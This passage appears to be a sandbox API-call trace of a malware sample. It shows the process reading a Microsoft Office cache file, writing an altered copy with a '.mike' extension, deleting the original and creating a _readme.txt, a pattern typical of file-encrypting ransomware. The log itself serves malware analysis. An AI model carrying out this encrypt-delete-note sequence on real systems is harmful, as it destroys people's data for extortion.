lpOldMode=0x2af1f4) returned 1 [0040.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0040.870] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab", lpFilePart=0x0) returned 0x4b [0040.871] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi", lpFilePart=0x0) returned 0x4c [0040.871] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", lpFilePart=0x0) returned 0x4c [0040.871] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", lpFilePart=0x0) returned 0x4c [0040.871] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", lpFilePart=0x0) returned 0x4c [0040.871] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0040.871] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.906] GetFileType (hFile=0x264) returned 0x1 [0040.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0040.906] GetFileType (hFile=0x264) returned 0x1 [0040.906] CloseHandle (hObject=0x264) returned 1 [0040.906] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", lpFilePart=0x0) returned 0x4c [0040.906] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", lpFilePart=0x0) returned 0x4c [0040.906] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0040.906] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0040.906] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0040.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0040.906] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.906] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), fInfoLevelId=0x0, lpFileInformation=0x21b6e70 | out: lpFileInformation=0x21b6e70*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x391)) returned 1 [0040.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.906] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", lpFilePart=0x0) returned 0x4c [0040.907] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.907] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), fInfoLevelId=0x0, lpFileInformation=0x21b71a4 | out: lpFileInformation=0x21b71a4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x391)) returned 1 [0040.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.907] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", lpFilePart=0x0) returned 0x4c [0040.907] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.mike", lpFilePart=0x0) returned 0x51 [0040.907] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.907] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.907] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", lpFilePart=0x0) returned 0x4c [0040.907] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", lpFilePart=0x0) returned 0x4c [0040.907] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", lpFilePart=0x0) returned 0x4c [0040.907] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.mike", lpFilePart=0x0) returned 0x51 [0040.907] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0040.907] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0040.907] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.mike", lpFilePart=0x0) returned 0x51 [0040.908] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0040.908] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.908] GetFileType (hFile=0x264) returned 0x1 [0040.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0040.908] GetFileType (hFile=0x264) returned 0x1 [0040.908] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0040.908] WriteFile (in: hFile=0x264, lpBuffer=0x21b80b8*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x21b80b8*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0040.909] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0040.909] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), fInfoLevelId=0x0, lpFileInformation=0x21b7b98 | out: lpFileInformation=0x21b7b98*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x391)) returned 1 [0040.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0040.909] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", lpFilePart=0x0) returned 0x4c [0040.909] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0040.909] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.909] GetFileType (hFile=0x264) returned 0x1 [0040.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0040.909] GetFileType (hFile=0x264) returned 0x1 [0040.910] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0040.910] ReadFile (in: hFile=0x264, lpBuffer=0x21b91f0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x21b91f0*, lpNumberOfBytesRead=0x2af110*=0x391, lpOverlapped=0x0) returned 1 [0040.911] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.mike", lpFilePart=0x0) returned 0x51 [0040.911] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0040.912] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.912] GetFileType (hFile=0x264) returned 0x1 [0040.912] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0040.912] GetFileType (hFile=0x264) returned 0x1 [0040.912] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0040.912] WriteFile (in: hFile=0x264, lpBuffer=0x21bd650*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x21bd650*, lpNumberOfBytesWritten=0x2af104*=0x3a0, lpOverlapped=0x0) returned 1 [0040.912] CloseHandle (hObject=0x264) returned 1 [0040.913] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.mike", lpFilePart=0x0) returned 0x51 [0040.913] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0040.913] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.913] GetFileType (hFile=0x264) returned 0x1 [0040.913] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0040.913] GetFileType (hFile=0x264) returned 0x1 [0040.914] WriteFile (in: hFile=0x264, lpBuffer=0x21c0888*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x21c0888*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0040.914] CloseHandle (hObject=0x264) returned 1 [0040.915] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", lpFilePart=0x0) returned 0x4c [0040.915] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.mike", lpFilePart=0x0) returned 0x51 [0040.915] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.915] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe296f540, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe296f540, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe296f540, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x5c0)) returned 1 [0040.915] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.915] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", lpFilePart=0x0) returned 0x4c [0040.915] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.mike", lpFilePart=0x0) returned 0x51 [0040.915] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.915] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x21c203c | out: lpFileInformation=0x21c203c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe296f540, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe296f540, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe296f540, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x5c0)) returned 1 [0040.915] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.915] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", lpFilePart=0x0) returned 0x4c [0040.915] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", dwFileAttributes=0x80) returned 1 [0040.916] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", lpFilePart=0x0) returned 0x4c [0040.916] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml")) returned 1 [0040.917] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", lpFilePart=0x0) returned 0x4c [0040.917] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.917] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.917] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.917] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", lpFilePart=0x0) returned 0x4c [0040.917] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0040.917] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0040.917] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0040.917] GetFileType (hFile=0x264) returned 0x1 [0040.917] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0040.917] GetFileType (hFile=0x264) returned 0x1 [0040.917] WriteFile (in: hFile=0x264, lpBuffer=0x21c3d58*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x21c3d58*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0040.918] CloseHandle (hObject=0x264) returned 1 [0040.918] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.918] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.919] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.919] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0040.919] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.919] GetFileType (hFile=0x264) returned 0x1 [0040.919] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0040.919] GetFileType (hFile=0x264) returned 0x1 [0040.919] CloseHandle (hObject=0x264) returned 1 [0040.919] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.919] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.919] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0040.919] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0040.919] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0040.919] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 